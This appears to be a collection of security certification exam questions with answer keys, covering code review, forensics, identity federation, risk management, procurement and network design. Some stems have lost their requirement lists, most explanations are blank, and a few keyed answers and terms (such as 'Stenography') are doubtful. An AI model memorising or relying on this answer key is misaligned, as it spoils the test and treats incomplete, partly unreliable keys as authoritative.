QUESTION NO: 141 The following has been discovered in an internally developed application: Error - Memory allocated but not freed: char *myBuffer = malloc(BUFFER_SIZE); if (myBuffer != NULL) { *myBuffer = STRING_WELCOME_MESSAGE; printf("Welcome to: %s\n", myBuffer); } exit(0); Which of the following security assessment methods are likely to reveal this security weakness? (Select TWO). A. Static code analysis B. Memory dumping C. Manual code review D. Application sandboxing E. Penetration testing F. Black box testing

Answer: A,C Explanation: A Code review refers to the examination of an application (the new network based software product in this case) that is designed to identify and assess threats to the organization. Application code review - whether manual or static will reveal the type of security weakness as shown in the exhibit.

QUESTION NO: 369 A Security Manager is part of a team selecting web conferencing systems for internal use. The system will only be used for internal employee collaboration. Which of the following are the MAIN concerns of the security manager? (Select THREE). A. Security of data storage B. The cost of the solution C. System availability D. User authentication strategy E. PBX integration of the service F. Operating system compatibility

Answer: A,C,D Explanation:

QUESTION NO: 297 The <nameID> element in SAML can be provided in which of the following predefined formats? (Select TWO). A. X.509 subject name B. PTR DNS record C. EV certificate OID extension D. Kerberos principal name E. WWN record name

Answer: A,D Explanation:

QUESTION NO: 452 A company has migrated its data and application hosting to a cloud service provider (CSP). To meet its future needs, the company considers an IdP. Why might the company want to select an IdP that is separate from its CSP? (Select TWO). A. A circle of trust can be formed with all domains authorized to delegate trust to an IdP B. Identity verification can occur outside the circle of trust if specified or delegated C. Replication of data occurs between the CSP and IdP before a verification occurs D. Greater security can be provided if the circle of trust is formed within multiple CSP domains E. Faster connections can occur between the CSP and IdP without the use of SAML

Answer: A,D Explanation:

QUESTION NO: 139 Which of the following would be used in forensic analysis of a compromised Linux system? (Select THREE). A. Check log files for logins from unauthorized IPs. B. Check /proc/kmem for fragmented memory segments. C. Check for unencrypted passwords in /etc/shadow. D. Check timestamps for files modified around time of compromise. E. Use lsof to determine files with future timestamps. F. Use gpg to encrypt compromised data files. G. Verify the MD5 checksum of system binaries. H. Use vmstat to look for excessive disk I/O.

Answer: A,D,G Explanation: The MD5 checksum of the system binaries will allow you to carry out a forensic analysis of the compromised Linux system. Together with the log files of logins into the compromised system from unauthorized IPs and the timestamps for those files that were modified around the time that the compromise occurred will serve as useful forensic tools.

QUESTION NO: 181 The IT director has charged the company helpdesk with sanitizing fixed and removable media. The helpdesk manager has written a new procedure to be followed by the helpdesk staff. This procedure includes the current standard to be used for data sanitization, as well as the location of physical degaussing tools. In which of the following cases should the helpdesk staff use the new procedure? (Select THREE). A. During asset disposal B. While reviewing the risk assessment C. While deploying new assets D. Before asset repurposing E. After the media has been disposed of F. During the data classification process G. When installing new printers H. When media fails or is unusable

Answer: A,D,H Explanation: Data sanitization using physical degaussing tools is the use of magnets to completely destroy data on a storage device. This is performed to ensure confidentiality of data, that is, that the data stored on the device cannot be recovered by unauthorized users. This should be performed when disposing of a storage device or when repurposing a storage device. When media fails or is unreadable, it would be disposed and thus should also be sanitized.

QUESTION NO: 279 A business wants to start using social media to promote the corporation and to ensure that customers have a good experience with their products. Which of the following security items should the company have in place before implementation? (Select TWO). A. The company must dedicate specific staff to act as social media representatives of the company. B. All staff needs to be instructed in the proper use of social media in the work environment. C. Senior staff blogs should be ghost written by marketing professionals. D. The finance department must provide a cost benefit analysis for social media. E. The security policy needs to be reviewed to ensure that social media policy is properly implemented. F. The company should ensure that the company has sufficient bandwidth to allow for social media traffic.

Answer: A,E Explanation:

QUESTION NO: 445 A security engineer is a new member to a configuration board at the request of management. The company has two new major IT projects starting this year and wants to plan security into the application deployment. The board is primarily concerned with the applications' compliance with federal assessment and authorization standards. The security engineer asks for a timeline to determine when a security assessment of both applications should occur and does not attend subsequent configuration board meetings. If the security engineer is only going to perform a security assessment, which of the following steps in system authorization has the security engineer omitted? (Select TWO). A. Establish the security control baseline to be assessed B. Build the application according to software development security standards C. Write the systems functionality requirements into the security requirements traceability matrix D. Review the results of user acceptance testing E. Categorize the applications according to use F. Consult with the stakeholders to determine which standards can be omitted

Answer: A,E Explanation:

QUESTION NO: 108 A security firm is writing a response to an RFP from a customer that is building a new network based software product. The firm's expertise is in penetration testing corporate networks. The RFP explicitly calls for all possible behaviors of the product to be tested, however, it does not specify any particular method to achieve this goal. Which of the following should be used to ensure the security and functionality of the product? (Select TWO). A. Code review B. Penetration testing C. Grey box testing D. Code signing E. White box testing

Answer: A,E Explanation: A Code review refers to the examination of an application (the new network based software product in this case) that is designed to identify and assess threats to the organization. White box testing assumes that the penetration test team has full knowledge of the network and the infrastructure per se thus rendering the testing to follow a more structured approach.

QUESTION NO: 406 The security administrator of a large enterprise is tasked with installing and configuring a solution that will allow the company to inspect HTTPS traffic for signs of hidden malware and to detect data exfiltration over encrypted channels. After installing a transparent proxy server, the administrator is ready to configure the HTTPS traffic inspection engine and related network equipment. Which of the following should the security administrator implement as part of the network and proxy design to ensure the browser will not display any certificate errors when browsing HTTPS sites? (Select THREE). A. Install a self-signed Root CA certificate on the proxy server. B. The proxy configuration of all users' browsers must point to the proxy IP. C. TCP port 443 requests must be redirected to TCP port 80 on the web server. D. All users' personal certificates' public key must be installed on the proxy. E. Implement policy-based routing on a router between the hosts and the Internet. F. The proxy certificate must be installed on all users' browsers.

Answer: A,E,F Explanation:

QUESTION NO: 160 An intruder was recently discovered inside the data center, a highly sensitive area. To gain access, the intruder circumvented numerous layers of physical and electronic security measures. Company leadership has asked for a thorough review of physical security controls to prevent this from happening again. Which of the following departments are the MOST heavily invested in rectifying the problem? (Select THREE). A. Facilities management B. Human resources C. Research and development D. Programming E. Data center operations F. Marketing G. Information technology

Answer: A,E,G Explanation: A: Facilities management is responsible for the physical security measures in a facility or building. E: The breach occurred in the data center, therefore the Data center operations would be greatly concerned. G: Data centers are important aspects of information technology (IT) in large corporations. Therefore the IT department would be greatly concerned.

QUESTION NO: 351 A general insurance company wants to set up a new online business. The requirements are that the solution needs to be: The conceptual solution architecture has specified that the application will consist of a traditional three tiered architecture for the front end components, an ESB to provide services, data transformation capability and legacy system integration and a web services gateway. Which of the following security components will BEST meet the above requirements and fit into the solution architecture? (Select TWO). A. Implement WS-Security for services authentication and XACML for service authorization. B. Use end-to-end application level encryption to encrypt all fields and store them encrypted in the database. C. Implement a certificate based solution on a smart card in combination with a PIN to provide authentication and authorization of users. D. Implement WS-Security as a federated single sign-on solution for authentication authorization of users. E. Implement SSL encryption for all sensitive data flows and encryption of passwords of the data at rest. F. Use application level encryption to encrypt sensitive fields, SSL encryption on sensitive flows, and database encryption for sensitive data storage.

Answer: A,F Explanation:

QUESTION NO: 320 A Chief Information Security Officer (CISO) of a major consulting firm has significantly increased the company's security posture; however, the company is still plagued by data breaches of misplaced assets. These data breaches as a result have led to the compromise of sensitive corporate and client data on at least 25 occasions. Each employee in the company is provided a laptop to perform company business. Which of the following actions can the CISO take to mitigate the breaches? A. Reload all user laptops with full disk encryption software immediately. B. Implement full disk encryption on all storage devices the firm owns. C. Implement new continuous monitoring procedures. D. Implement an open source system which allows data to be encrypted while processed.

Answer: B Explanation:

QUESTION NO: 191 A project manager working for a large city government is required to plan and build a WAN, which will be required to host official business and public access. It is also anticipated that the city's emergency and first response communication systems will be required to operate across the same network. The project manager has experience with enterprise IT projects, but feels this project has an increased complexity as a result of the mixed business / public use and the critical infrastructure it will provide. Which of the following should the project manager release to the public, academia, and private industry to ensure the city provides due care in considering all project factors prior to building its new WAN? A. NDA B. RFI C. RFP D. RFQ

Answer: B Explanation: A request for information (RFI) seeks information from suppliers for a specific purpose. One big difference is that companies and suppliers are not obligated to respond.

QUESTION NO: 169 The helpdesk department desires to roll out a remote support application for internal use on all company computers. This tool should allow remote desktop sharing, system log gathering, chat, hardware logging, inventory management, and remote registry access. The risk management team has been asked to review vendor responses to the RFQ. Which of the following questions is the MOST important? A. What are the protections against MITM? B. What accountability is built into the remote support application? C. What encryption standards are used in tracking database? D. What snapshot or "undo" features are present in the application? E. What encryption standards are used in remote desktop and file transfer functionality?

Answer: B Explanation:

QUESTION NO: 170 A software development manager is taking over an existing software development project. The team currently suffers from poor communication due to a long delay between requirements documentation and feature delivery. This gap is resulting in an above average number of securityrelated bugs making it into production. Which of the following development methodologies is the team MOST likely using now? A. Agile B. Waterfall C. Scrum D. Spiral

Answer: B Explanation:

QUESTION NO: 240 Company A has a remote work force that often includes independent contractors and out of state full time employees. Company A's security engineer has been asked to implement a solution allowing these users to collaborate on projects with the following goals: Which of the following solutions should the security engineer recommend to meet the MOST goals? A. Create an SSL reverse proxy to a collaboration workspace. Use remote installation service to maintain application version. Have users use full desktop encryption. Schedule server downtime from 12:00 to 1:00 PM. B. Install an SSL VPN to Company A's datacenter, have users connect to a standard virtual workstation image, set workstation time of day restrictions. C. Create an extranet web portal using third party web based office applications. Ensure that Company A maintains the administrative access. D. Schedule server downtime from 12:00 to 1:00 PM, implement a Terminal Server Gateway, use remote installation services to standardize application on user's laptops.

Answer: B Explanation:

QUESTION NO: 249 The security administrator at a company has received a subpoena for the release of all the email received and sent by the company Chief Information Officer (CIO) for the past three years. The security administrator is only able to find one year's worth of email records on the server and is now concerned about the possible legal implications of not complying with the request. Which of the following should the security administrator check BEFORE responding to the request? A. The company data privacy policies B. The company backup logs and archives C. The company data retention policies and guidelines D. The company data retention procedures

Answer: B Explanation:

QUESTION NO: 261 The Chief Information Officer (CIO) of a technology company is likely to move away from a deperimeterized model for employee owned devices. This is because there were too many issues with lack of patching, malware incidents, and data leakage due to lost/stolen devices which did not have full-disk encryption. The 'bring your own computing' approach was originally introduced because different business units preferred different operating systems and application stacks. Based on the issues and user needs, which of the following is the BEST recommendation for the CIO to make? A. The de-perimeterized model should be kept as this is major industry trend and other companies are following this direction. Advise that the issues being faced are standard business as usual concerns in a modern IT environment. B. Update the policy to disallow non-company end-point devices on the corporate network. Develop security-focused standard operating environments (SOEs) for all required operating systems and ensure the needs of each business unit are met. C. The de-perimeterized model should be kept but update company policies to state that noncompany end-points require full disk encryption, anti-virus software, and regular patching. D. Update the policy to disallow non-company end-point devices on the corporate network. Allow only one type of outsourced SOE to all users as this will be easier to provision, secure, and will save money on operating costs.

Answer: B Explanation:

QUESTION NO: 275 A security manager is developing new policies and procedures. Which of the following is a best practice in end user security? A. Employee identity badges and physical access controls to ensure only staff are allowed onsite. B. A training program that is consistent, ongoing, and relevant. C. Access controls to prevent end users from gaining access to confidential data. D. Access controls for computer systems and networks with two-factor authentication.

Answer: B Explanation:

QUESTION NO: 280 An administrator at a small company replaces servers whenever budget money becomes available. Over the past several years the company has acquired and still uses 20 servers and 50 desktops from five different computer manufacturers. Which of the following are management challenges and risks associated with this style of technology lifecycle management? A. Decreased security posture, decommission of outdated hardware, inability to centrally manage, and performance bottlenecks on old hardware. B. Increased mean time to failure rate of legacy servers, OS variances, patch availability, and ability to restore to dissimilar hardware. C. OS end-of-support issues, ability to backup data, hardware parts availability, and firmware update availability and management. D. Inability to use virtualization, trusted OS complexities, and multiple patch versions based on OS dependency.

Answer: B Explanation:

QUESTION NO: 287 A security administrator wants to verify and improve the security of a business process which is tied to proven company workflow. The security administrator was able to improve security by applying controls that were defined by the newly released company security standard. Such controls included code improvement, transport encryption, and interface restrictions. Which of the following can the security administrator do to further increase security after having exhausted all the technical controls dictated by the company's security standard? A. Modify the company standard to account for higher security and meet with upper management for approval to implement the new standard. B. Conduct a gap analysis and recommend appropriate non-technical mitigating controls, and incorporate the new controls into the standard. C. Conduct a risk analysis on all current controls, and recommend appropriate mechanisms to increase overall security. D. Modify the company policy to account for higher security, adapt the standard accordingly, and implement new technical controls.

Answer: B Explanation:

QUESTION NO: 292 A small customer focused bank with implemented least privilege principles, is concerned about the possibility of branch staff unintentionally aiding fraud in their day to day interactions with customers. Bank staff has been encouraged to build friendships with customers to make the banking experience feel more personal. The security and risk team have decided that a policy needs to be implemented across all branches to address the risk. Which of the following BEST addresses the security and risk team's concerns? A. Information disclosure policy B. Awareness training C. Job rotation D. Separation of duties

Answer: B Explanation:

QUESTION NO: 293 A hosting company provides inexpensive guest virtual machines to low-margin customers. Customers manage their own guest virtual machines. Some customers want basic guarantees of logical separation from other customers and it has been indicated that some customers would like to have configuration control of this separation; whereas others want this provided as a valueadded service by the hosting company. Which of the following BEST meets these requirements? A. The hosting company should install a hypervisor-based firewall and allow customers to manage this on an as-needed basis. B. The hosting company should manage the hypervisor-based firewall; while allowing customers to configure their own host-based firewall. C. Customers should purchase physical firewalls to protect their guest hosts and have the hosting company manage these if requested. D. The hosting company should install a host-based firewall on customer guest hosts and offer to administer host firewalls for customers if requested.

Answer: B Explanation:

QUESTION NO: 296 After three vendors submit their requested documentation, the CPO and the SPM can better understand what each vendor does and what solutions that they can provide. But now they want to see the intricacies of how these solutions can adequately match the requirements needed by the firm. Upon the directive of the CPO, the CISO should submit which of the following to the three submitting firms? A. A T&M contract B. An RFP C. A FFP agreement D. A new RFQ

Answer: B Explanation:

QUESTION NO: 304 A security administrator at a Lab Company is required to implement a solution which will provide the highest level of confidentiality possible to all data on the lab network. The current infrastructure design includes: The network is protected with a firewall implementing ACLs, a NIPS device, and secured wireless access points. Which of the following cryptographic improvements should be made to the current architecture to achieve the stated goals? A. PKI based authorization B. Transport encryption C. Data at rest encryption D. Code signing

Answer: B Explanation:

QUESTION NO: 311 A University uses a card transaction system that allows students to purchase goods using their student ID. Students can put money on their ID at terminals throughout the campus. The security administrator was notified that computer science students have been using the network to illegally put money on their cards. The administrator would like to attempt to reproduce what the students are doing. Which of the following is the BEST course of action? A. Notify the transaction system vendor of the security vulnerability that was discovered. B. Use a protocol analyzer to reverse engineer the transaction system's protocol. C. Contact the computer science students and threaten disciplinary action if they continue their actions. D. Install a NIDS in front of all the transaction system terminals.

Answer: B Explanation:

QUESTION NO: 314 The marketing department at Company A regularly sends out emails signed by the company's Chief Executive Officer (CEO) with announcements about the company. The CEO sends company and personal emails from a different email account. During legal proceedings against the company, the Chief Information Officer (CIO) must prove which emails came from the CEO and which came from the marketing department. The email server allows emails to be digitally signed and the corporate PKI provisioning allows for one certificate per user. The CEO did not share their password with anyone. Which of the following will allow the CIO to state which emails the CEO sent and which the marketing department sent? A. Identity proofing B. Non-repudiation C. Key escrow D. Digital rights management

Answer: B Explanation:

QUESTION NO: 316 A helpdesk manager at a financial company has received multiple reports from employees and customers that their phone calls sound metallic on the voice system. The helpdesk has been using VoIP lines encrypted from the handset to the PBX for several years. Which of the following should be done to address this issue for the future? A. SIP session tagging and QoS B. A dedicated VLAN C. Lower encryption setting D. Traffic shaping

Answer: B Explanation:

QUESTION NO: 318 A newly-appointed risk management director for the IT department at Company XYZ, a major pharmaceutical manufacturer, needs to conduct a risk analysis regarding a new system which the developers plan to bring on-line in three weeks. The director begins by reviewing the thorough and well-written report from the independent contractor who performed a security assessment of the system. The report details what seem to be a manageable volume of infrequently exploited security vulnerabilities. The director decides to implement continuous monitoring and other security controls to mitigate the impact of the vulnerabilities. Which of the following should the director require from the developers before agreeing to deploy the system? A. An incident response plan which guarantees response by tier two support within 15 minutes of an incident. B. A definitive plan of action and milestones which lays out resolutions to all vulnerabilities within six months. C. Business insurance to transfer all risk from the company shareholders to the insurance company. D. A prudent plan of action which details how to decommission the system within 90 days of becoming operational.

Answer: B Explanation:

QUESTION NO: 327 As part of the ongoing information security plan in a large software development company, the Chief Information officer (CIO) has decided to review and update the company's privacy policies and procedures to reflect the changing business environment and business requirements. Training and awareness of the new policies and procedures has been incorporated into the security awareness program which should be: A. presented by top level management to only data handling staff. B. customized for the various departments and staff roles. C. technical in nature to ensure all development staff understand the procedures. D. used to promote the importance of the security department.

Answer: B Explanation:

QUESTION NO: 330 The risk committee has endorsed the adoption of a security system development life cycle (SSDLC) designed to ensure compliance with PCI-DSS, HIPAA, and meet the organization's mission. Which of the following BEST describes the correct order of implementing a five phase SSDLC? A. Initiation, assessment/acquisition, development/implementation, operations/maintenance and sunset. B. Initiation, acquisition/development, implementation/assessment, operations/maintenance and sunset. C. Assessment, initiation/development, implementation/assessment, operations/maintenance and disposal. D. Acquisition, initiation/development, implementation/assessment, operations/maintenance and disposal.

Answer: B Explanation:

QUESTION NO: 335 An administrator receives reports that the network is running slow for users connected to a certain switch. Viewing the network traffic, the administrator reviews the following: 18:51:59.042108 IP linuxwksta.55467 > dns.company.com.domain: 39462+ PTR? 222.17.4.10.inaddr. arpa. (42) 18:51:59.055732 IP dns.company.com.domain > linuxwksta.55467: 39462 NXDomain 0/0/0 (42) 18:51:59.055842 IP linuxwksta.48287 > dns.company.com.domain: 46767+ PTR? 255.19.4.10.inaddr. arpa. (42) 18:51:59.069816 IP dns.company.com.domain > linuxwksta.48287: 46767 NXDomain 0/0/0 (42) 18:51:59.159060 IP linuxwksta.42491 > 10.4.17.72.iscsi-target: Flags [P.], seq 1989625106:1989625154, ack 2067334822, win 1525, options [nop,nop,TS val 16021424 ecr 215646227], length 48 18:51:59.159145 IP linuxwksta.48854 > dns.company.com.domain: 3834+ PTR? 72.17.4.10.inaddr. arpa. (41) 18:51:59.159314 IP 10.4.17.72.iscsi-target > linuxwksta.42491: Flags [P.], seq 1:49, ack 48, win 124, options [nop,nop,TS val 215647479 ecr 16021424], length 48 18:51:59.159330 IP linuxwksta.42491 > 10.4.17.72.iscsi-target: Flags [.], ack 49, win 1525, options [nop,nop,TS val 16021424 ecr 215647479], length 0 18:51:59.165342 IP dns.company.com.domain > linuxwksta.48854: 3834 NXDomain 0/0/0 (41) 18:51:59.397461 ARP, Request who-has 10.4.16.58 tell 10.4.16.1, length 46 18:51:59.397597 IP linuxwksta.37684 > dns.company.com.domain: 15022+ PTR? 58.16.4.10.inaddr. arpa. (41) Given the traffic report, which of the following is MOST likely causing the slow traffic? A. DNS poisoning B. Improper network zoning C. ARP poisoning D. Improper LUN masking

Answer: B Explanation:

QUESTION NO: 339 The internal audit department is investigating a possible breach of security. One of the auditors is sent to interview the following employees: Employee A. Works in the accounts receivable office and is in charge of entering data into the finance system. Employee B. Works in the accounts payable office and is in charge of approving purchase orders. Employee C. Is the manager of the finance department, supervises Employee A and Employee B, and can perform the functions of both Employee A and Employee B. Which of the following should the auditor suggest be done to avoid future security breaches? A. All employees should have the same access level to be able to check on each others. B. The manager should only be able to review the data and approve purchase orders. C. Employee A and Employee B should rotate jobs at a set interval and cross-train. D. The manager should be able to both enter and approve information.

Answer: B Explanation:

QUESTION NO: 341 An organization is preparing to upgrade its firewall and NIPS infrastructure and has narrowed the vendor choices down to two platforms. The integrator chosen to assist the organization with the deployment has many clients running a mixture of the possible combinations of environments. Which of the following is the MOST comprehensive method for evaluating the two platforms? A. Benchmark each possible solution with the integrators existing client deployments. B. Develop testing criteria and evaluate each environment in-house. C. Run virtual test scenarios to validate the potential solutions. D. Use results from each vendor's test labs to determine adherence to project requirements.

Answer: B Explanation:

QUESTION NO: 342 An administrator has four virtual guests on a host server. Two of the servers are corporate SQL servers, one is a corporate mail server, and one is a testing web server for a small group of developers. The administrator is experiencing difficulty connecting to the host server during peak network usage times. Which of the following would allow the administrator to securely connect to and manage the host server during peak usage times? A. Increase the virtual RAM allocation to high I/O servers. B. Install a management NIC and dedicated virtual switch. C. Configure the high I/O virtual servers to use FCoE rather than iSCSI. D. Move the guest web server to another dedicated host.

Answer: B Explanation:

QUESTION NO: 347 A large enterprise introduced a next generation firewall appliance into the Internet facing DMZ. All Internet traffic passes through this appliance. Four hours after implementation the network engineering team discovered that traffic through the DMZ now has un-acceptable latency, and is recommending that the new firewall be taken offline. At what point in the implementation process should this problem have been discovered? A. During the product selection phase B. When testing the appliance C. When writing the RFP for the purchase process D. During the network traffic analysis phase

Answer: B Explanation:

QUESTION NO: 353 Company XYZ has employed a consultant to perform a controls assessment of the HR system, backend business operations, and the SCADA system used in the factory. Which of the following correctly states the risk management options that the consultant should use during the assessment? A. Risk reduction, risk sharing, risk retention, and risk acceptance. B. Avoid, transfer, mitigate, and accept. C. Risk likelihood, asset value, and threat level. D. Calculate risk by determining technical likelihood and potential business impact.

Answer: B Explanation:

QUESTION NO: 355 A system administrator has installed a new Internet facing secure web application that consists of a Linux web server and Windows SQL server into a new corporate site. The administrator wants to place the servers in the most logical network security zones and implement the appropriate security controls. Which of the following scenarios BEST accomplishes this goal? A. Create an Internet zone, DMZ, and Internal zone on the firewall. Place the web server in the DMZ. Configure IPtables to allow TCP 80 and 443. Set SELinux to permissive. Place the SQL server in the internal zone. Configure the Windows firewall to allow TCP 80 and 443. Configure the Internet zone with ACLs of allow 80 and 443 destination DMZ. B. Create an Internet zone, DMZ, and Internal zone on the firewall. Place the web server in the DMZ. Configure IPtables to allow TCP 443. Set enforcement threshold on SELinux to one. Place the SQL server in the internal zone. Configure the Windows firewall to allow TCP 1433 and 1443. Configure the Internet zone with ACLs of allow 443 destination DMZ. C. Create an Internet zone and two DMZ zones on the firewall. Place the web server in the DMZ one. Set the enforcement threshold on SELinux to 100, and configure IPtables to allow TCP 80 and 443. Place the SQL server in DMZ two. Configure the Windows firewall to allow TCP 80 and 443. Configure the Internet zone with an ACL of allow 443 destination ANY. D. Create an Internet zone and two DMZ zones on the firewall. Place the web server in DMZ one. Set enforcement threshold on SELinux to zero, and configure IPtables to allow TCP 80 and 443. Place the SQL server in DMZ two. Configure the Internet zone ACLs with allow 80, 443, 1433, and 1443 destination ANY.

Answer: B Explanation:

QUESTION NO: 357 Company XYZ plans to donate 1,000 used computers to a local school. The company has a large research and development section and some of the computers were previously used to store proprietary research. The security administrator is concerned about data remnants on the donated machines, but the company does not have a device sanitization section in the data handling policy. Which of the following is the BEST course of action for the security administrator to take? A. Delay the donation until a new policy is approved by the Chief Information Officer (CIO), and then donate the machines. B. Delay the donation until all storage media on the computers can be sanitized. C. Reload the machines with an open source operating system and then donate the machines. D. Move forward with the donation, but remove all software license keys from the machines.

Answer: B Explanation:

QUESTION NO: 361 A new IDS device is generating a very large number of irrelevant events. Which of the following would BEST remedy this problem? A. Change the IDS to use a heuristic anomaly filter. B. Adjust IDS filters to decrease the number of false positives. C. Change the IDS filter to data mine the false positives for statistical trending data. D. Adjust IDS filters to increase the number of false negatives.

Answer: B Explanation:

QUESTION NO: 379 Company ABC will test connecting networks with Company XYZ as part of their upcoming merger and are both concerned with minimizing security exposures to each others network throughout the test. Which of the following is the FIRST thing both sides should do prior to connecting the networks? A. Create a DMZ to isolate the two companies and provide a security inspection point for all intercompany network traffic. B. Determine the necessary data flows between the two companies. C. Implement a firewall that restricts everything except the IPSec VPN traffic connecting the two companies. D. Implement inline NIPS on the connection points between the two companies.

Answer: B Explanation:

QUESTION NO: 383 When generating a new key pair, a security application asks the user to move the mouse and type random characters on the keyboard. Which of the following BEST describes why this is necessary? A. The user needs a non-repudiation data source in order for the application to generate the key pair. B. The user is providing entropy so the application can use random data to create the key pair. C. The user is providing a diffusion point to the application to aid in creating the key pair. D. The application is requesting perfect forward secrecy from the user in order to create the key pair.

Answer: B Explanation:

QUESTION NO: 384 Company XYZ has experienced a breach and has requested an internal investigation be conducted by the IT Department. Which of the following represents the correct order of the investigation process? A. Collection, Identification, Preservation, Examination, Analysis, Presentation. B. Identification, Preservation, Collection, Examination, Analysis, Presentation. C. Collection, Preservation, Examination, Identification, Analysis, Presentation. D. Identification, Examination, Preservation, Collection, Analysis, Presentation.

Answer: B Explanation:

QUESTION NO: 385 A medium-sized company has recently launched an online product catalog. It has decided to keep the credit card purchasing in-house as a secondary potential income stream has been identified in relation to sales leads. The company has decided to undertake a PCI assessment in order to determine the amount of effort required to meet the business objectives. Which compliance category would this task be part of? A. Government regulation B. Industry standard C. Company guideline D. Company policy

Answer: B Explanation:

QUESTION NO: 387 An Association is preparing to upgrade their firewalls at five locations around the United States. Each of the three vendor's RFP responses is in-line with the security and other requirements. Which of the following should the security administrator do to ensure the firewall platform is appropriate for the Association? A. Correlate current industry research with the RFP responses to ensure validity. B. Create a lab environment to evaluate each of the three firewall platforms. C. Benchmark each firewall platform's capabilities and experiences with similar sized companies. D. Develop criteria and rate each firewall platform based on information in the RFP responses.

Answer: B Explanation:

QUESTION NO: 392 A corporation implements a mobile device policy on smartphones that utilizes a white list for allowed applications. Recently, the security administrator notices that a consumer cloud based storage application has been added to the mobile device white list. Which of the following security implications should the security administrator cite when recommending the application's removal from the white list? A. Consumer cloud storage systems retain local copies of each file on the smartphone, as well as in the cloud, causing a potential data breach if the phone is lost or stolen. B. Smartphones can export sensitive data or import harmful data with this application causing the potential for DLP or malware issues. C. Consumer cloud storage systems could allow users to download applications to the smartphone. Installing applications this way would circumvent the application white list. D. Smartphones using consumer cloud storage are more likely to have sensitive data remnants on them when they are repurposed.

Answer: B Explanation:

QUESTION NO: 395 A security auditor is conducting an audit of a corporation where 95% of the users travel or work from non-corporate locations a majority of the time. While the employees are away from the corporate offices, they retain full access to the corporate network and use of corporate laptops. The auditor knows that the corporation processes PII and other sensitive data with applications requiring local caches of any data being manipulated. Which of the following security controls should the auditor check for and recommend to be implemented if missing from the laptops? A. Trusted operating systems B. Full disk encryption C. Host-based firewalls D. Command shell restrictions

Answer: B Explanation:

QUESTION NO: 397 Which of the following BEST describes the implications of placing an IDS device inside or outside of the corporate firewall? A. Placing the IDS device inside the firewall will allow it to monitor potential internal attacks but may increase the load on the system. B. Placing the IDS device outside the firewall will allow it to monitor potential remote attacks while still allowing the firewall to block the attack. C. Placing the IDS device inside the firewall will allow it to monitor potential remote attacks but may increase the load on the system. D. Placing the IDS device outside the firewall will allow it to monitor potential remote attacks but the firewall will not be able to block the attacks.

Answer: B Explanation:

QUESTION NO: 415 A security engineer at a bank has detected a Zeus variant, which relies on covert communication channels to receive new instructions and updates from the malware developers. As a result, NIPS and AV systems did not detect the configuration files received by staff in emails that appeared as normal files. Which of the following BEST describes the technique used by the malware developers? A. Perfect forward secrecy B. Stenography C. Diffusion D. Confusion E. Transport encryption

Answer: B Explanation:

QUESTION NO: 416 A security engineer wants to implement forward secrecy but still wants to ensure the number of requests handled by the web server is not drastically reduced due to the larger computational overheads. Browser compatibility is not a concern; however system performance is. Which of the following, when implemented, would BEST meet the engineer's requirements? A. DHE B. ECDHE C. AES128-SHA D. DH

Answer: B Explanation:

QUESTION NO: 419 An IT administrator has been tasked with implementing an appliance-based web proxy server to control external content accessed by internal staff. Concerned with the threat of corporate data leakage via web-based email, the IT administrator wants to decrypt all outbound HTTPS sessions and pass the decrypted content to an ICAP server for inspection by the corporate DLP software. Which of the following is BEST at protecting the internal certificates used in the decryption process? A. NIPS B. HSM C. UTM D. HIDS E. WAF F. SIEM

Answer: B Explanation:

QUESTION NO: 421 A high-tech company dealing with sensitive data seized the mobile device of an employee suspected of leaking company secrets to a competitive organization. Which of the following is the BEST order for mobile phone evidence extraction? A. Device isolation, evidence intake, device identification, data processing, verification of data accuracy, documentation, reporting, presentation and archival. B. Evidence intake, device identification, preparation to identify the necessary tools, device isolation, data processing, verification of data accuracy, documentation, reporting, presentation and archival. C. Evidence log, device isolation ,device identification, preparation to identify the necessary tools, data processing, verification of data accuracy, presentation and archival. D. Device identification, evidence log, preparation to identify the necessary tools, data processing, verification of data accuracy, device isolation, documentation, reporting, presentation and archival.

Answer: B Explanation:

QUESTION NO: 424 An organization is finalizing a contract with a managed security services provider (MSSP) that is responsible for primary support of all security technologies. Which of the following should the organization require as part of the contract to ensure the protection of the organization's technology? A. An operational level agreement B. An interconnection security agreement C. A non-disclosure agreement D. A service level agreement

Answer: B Explanation:

QUESTION NO: 425 An administrator is trying to categorize the security impact of a database server in the case of a security event. There are three databases on the server. Current Financial Data = High level of damage if data is disclosed. Moderate damage if the system goes offline Archived Financial Data = No need for the database to be online. Low damage for integrity loss Public Website Data = Low damage if the site goes down. Moderate damage if the data is corrupted Given these security categorizations of each database, which of the following is the aggregate security categorization of the database server? A. Database server = {(Confidentiality HIGH),(Integrity High),(Availability High)} B. Database server = {(Confidentiality HIGH),(Integrity Moderate),(Availability Moderate)} C. Database server = {(Confidentiality HIGH),(Integrity Moderate),(Availability Low)} D. Database server = {(Confidentiality Moderate),(Integrity Moderate),(Availability Moderate)}

Answer: B Explanation:

QUESTION NO: 429 A security administrator is investigating the compromise of a software distribution website. Forensic analysis shows that several popular files are infected with malicious code. However, comparing a hash of the infected files with the original, non-infected files which were restored from backup, shows that the hash is the same. Which of the following explains this? A. The infected files were using obfuscation techniques to evade detection by antivirus software. B. The infected files were specially crafted to exploit a collision in the hash function. C. The infected files were using heuristic techniques to evade detection by antivirus software. D. The infected files were specially crafted to exploit diffusion in the hash function.

Answer: B Explanation:

QUESTION NO: 441 Which of the following is the information owner responsible for? A. Developing policies, standards, and baselines. B. Determining the proper classification levels for data within the system. C. Integrating security considerations into application and system purchasing decisions. D. Implementing and evaluating security controls by validating the integrity of the data.

Answer: B Explanation:

QUESTION NO: 442 A Chief Information Security Officer (CISO) is approached by a business unit manager who heard a report on the radio this morning about an employee at a competing firm who shipped a VPN token overseas so a fake employee could log into the corporate VPN. The CISO asks what can be done to mitigate the risk of such an incident occurring within the organization. Which of the following is the MOST cost effective way to mitigate such a risk? A. Require hardware tokens to be replaced on a yearly basis. B. Implement a biometric factor into the token response process. C. Force passwords to be changed every 90 days. D. Use PKI certificates as part of the VPN authentication process.

Answer: B Explanation:

QUESTION NO: 453 An internal committee comprised of the facilities manager, the physical security manager, the network administrator, and a member of the executive team has been formed to address a recent breach at a company's data center. It was discovered that during the breach, an HVAC specialist had gained entry to an area that contained server farms holding sensitive financial data. Although the HVAC specialist was there to fix a legitimate issue, the investigation concluded security be provided for the two entry and exit points for the server farm. Which of the following should be implemented to accomplish the recommendations of the investigation? A. Implement a policy that all non-employees should be escorted in the data center. B. Place a mantrap at the points with biometric security. C. Hire an HVAC person for the company, eliminating the need for external HVAC people. D. Implement CCTV cameras at both points.

Answer: B Explanation:

